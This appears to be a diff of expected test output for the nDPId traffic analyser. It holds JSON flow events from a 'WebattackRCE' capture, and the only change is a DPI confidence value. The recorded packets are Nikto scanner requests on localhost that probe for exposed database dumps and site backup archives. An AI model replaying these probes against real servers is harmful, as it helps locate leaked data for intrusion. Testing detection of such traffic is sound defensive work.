-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1576420276926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276926,"pkt":"AAAAAAAAAAAAAAAACABFAADIWd1AAEAG4lB\/AAABfwAAAcLSH5AL0mGV2bYy0oAYAED+vAAAAQEICp1m++adZvvmR0VUIC8xMjcuMC4wLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1576420276928,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276928,"pkt":"AAAAAAAAAAAAAAAACABFAADIwcZAAEAGemd\/AAABfwAAAcLUH5BvVfmVJOeoY4AYAED+vAAAAQEICp1m++idZvvoR0VUIC8xMjcuMC4wLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1576420276929,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276929,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/L19AAEAGDNh\/AAABfwAAAcLWH5BVghcOcLaACoAYAED+swAAAQEICp1m++mdZvvpR0VUIC8xMjcudGd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276932,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1576420276932,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276932,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/j\/RAAEAGrEJ\/AAABfwAAAcLYH5CKH7ek\/31EG4AYAED+swAAAQEICp1m++ydZvvsR0VUIC8xMjcudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276932,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276932,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1576420276933,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276933,"pkt":"AAAAAAAAAAAAAAAACABFAADFT2BAAEAG7NB\/AAABfwAAAcLaH5CU9HcQhzdjIYAYAED+uQAAAQEICp1m++2dZvvtR0VUIC9zaXRlLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276934,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1576420276934,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276934,"pkt":"AAAAAAAAAAAAAAAACABFAADFqdVAAEAGklt\/AAABfwAAAcLcH5A055GDxax\/gIAYAED+uQAAAQEICp1m++6dZvvuR0VUIC9zaXRlLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276934,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276934,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276936,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1576420276936,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276936,"pkt":"AAAAAAAAAAAAAAAACABFAADKdTNAAEAGxvh\/AAABfwAAAcLeH5C4Uk1kAkvbMoAYAED+vgAAAQEICp1m+++dZvvvR0VUIC8xMjcuMC4wLjEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276936,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276936,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276937,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 